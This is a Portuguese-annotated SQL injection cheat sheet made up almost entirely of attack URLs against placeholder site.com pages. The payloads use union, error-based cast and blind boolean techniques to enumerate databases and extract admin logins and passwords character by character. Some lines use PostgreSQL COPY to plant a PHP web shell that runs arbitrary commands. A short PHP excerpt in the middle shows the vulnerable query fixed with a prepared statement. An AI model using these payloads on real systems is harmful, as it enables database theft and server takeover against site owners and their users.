http://www.site.com/code?id=-10 union select NULL,column_name from information_schema.columns where table_name='NOME_DA_TABELA'
http://www.site.com/code?id=-10 union select NULL,COLUNM1||':'||COLUNM2||':'||COLUNM3 from DB_NAME.TABLE_NAME
Copy(select '<?php system($_REQUEST['cmd']);?>') to 'C:\www\site\shell.php';
http://www.site.com/code?id=-10 union select NULL,COLUNM1||':'||COLUNM2||':'||COLUNM3 from DB_NAME.TABLE_NAME;Copy(select '<?php system($_REQUEST['cmd']);?>') to 'C:\www\site\shell.php';
http://www.site.com/code.php?id=10 and 1=cast((select version())::text as int)--
http://www.site.com/code.php?id=10 and 1=cast( (CHR(60)) ||(select count(*) from information_schema.schemata)::text as int)--
http://www.site.com/code.php?id=10 and 1=cast((select current_schema())::text as int)--
http://www.site.com/code.php?id=10 and 1=cast((select schema_name from information_schema.schemata limit 1 offset 0)::text as int)--
--offset 1 --offset 2 --offset 3
http://www.site.com/code.php?id=10 and 1=cast((select schema_name from information_schema.schemata limit 1 offset 1)::text as int)--
http://www.site.com/code.php?id=10 and 1=cast((select schema_name from information_schema.schemata limit 1 offset 2)::text as int)--
http://www.site.com/code.php?id=10 and 1=cast((select table_name from information_schema.tables where table_schema=CHR(100) || CHR(98) || CHR(95) || CHR(115) || CHR(105) || CHR(116) || CHR(101) limit 1 offset 0)::text as int)--
--offset 1 --offset 2
http://www.site.com/code.php?id=10 and 1=cast((select column_name from information_schema.columns where table_schema=CHR(100) || CHR(98) || CHR(95) || CHR(115) || CHR(105) || CHR(116) || CHR(101) and table_name = CHR(97) || CHR(100) || CHR(109) || CHR(105) || CHR(110) limit 1 offset 0)::text as int)--
db:db_site table:admin coluna:login,senha
http://www.site.com/code.php?id=10 and 1=cast((select NOME_COLUNA from NOME_DB.NOME_TABELA)::text as int)--
http://www.site.com/code.php?id=10 and 1=cast((select login from db_site.admin)::text as int)--
http://www.site.com/code.php?id=10 and 1=cast((select senha from db_site.admin)::text as int)--
http://www.site.com/news.php?id=5 and 1=1 <- carrega normalmente
http://www.site.com/news.php?id=5 and 1=2 <- Algum defeito na página = VULNERÁVEL
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5
http://www.site.com/news.php?id=5 and (select 1)=1
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1
wp-users,webuser,user,login,admin,adm,administrator,etc...
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105
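<?php
/* [...] */

// The original excerpt read:
//     $sql = "SELECT * FROM noticias WHERE id = '$id'"; $q = mysql_query($sql);
// i.e. the raw request parameter was interpolated into the SQL text, which is
// exactly what lets a quote or keyword inside id change the query structure.

// Untrusted request parameter; default to '' so a missing id is not a notice.
$id = isset($_GET['id']) ? $_GET['id'] : '';

// Bind the value instead of interpolating it: the statement text is fixed at
// prepare time, so the contents of $id can only ever be compared as data.
// $link is the mysqli connection assumed to be opened in the elided setup
// above (the original relied on the implicit mysql_* link). '*' is kept only
// because the consumers of $r are outside this excerpt.
$stmt = mysqli_prepare($link, "SELECT * FROM noticias WHERE id = ?");
$r = false;
if ($stmt !== false) {
    // The original compared id as a quoted string, so bind it as one.
    mysqli_stmt_bind_param($stmt, 's', $id);
    if (mysqli_stmt_execute($stmt)) {
        // mysqli_stmt_get_result() needs the mysqlnd driver.
        $q = mysqli_stmt_get_result($stmt);
        // Mirrors the original @mysql_fetch_row(): false when there is no row.
        $r = ($q !== false) ? mysqli_fetch_row($q) : false;
    }
    mysqli_stmt_close($stmt);
}
/* [...] */
?>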
FALSE: http://www.site.com/index.php?id=10 AND 1=0
TRUE: http://www.site.com/index.php?id=10 AND 1=1
http://www.site.com/index.php?id=10 AND(SELECT Count(*) FROM users)
http://www.site.com/index.php?id=10 AND(SELECT Count(*) FROM admin)
http://www.site.com/index.php?id=10 AND(SELECT Count(nick) FROM admin)
http://www.site.com/index.php?id=10 AND(SELECT Count(password) FROM admin)
http://www.site.com/index.php?id=10 AND(SELECT length(password) FROM admin where id=1)=4 //FALSE http://www.site.com/index.php?id=10 AND(SELECT length(password) FROM admin where id=1)=6 //FALSE http://www.site.com/index.php?id=10 AND(SELECT length(password) FROM admin where id=1)=8 //TRUE
http://www.site.com/index.php?id=10 AND ascii(substring((SELECT concat(password) from admin limit 0,1),1,1))=102 <== TRUE
http://www.site.com/index.php?id=10 AND ascii(substring((SELECT concat(password) from admin limit 0,1),2,1))=121 <== TRUE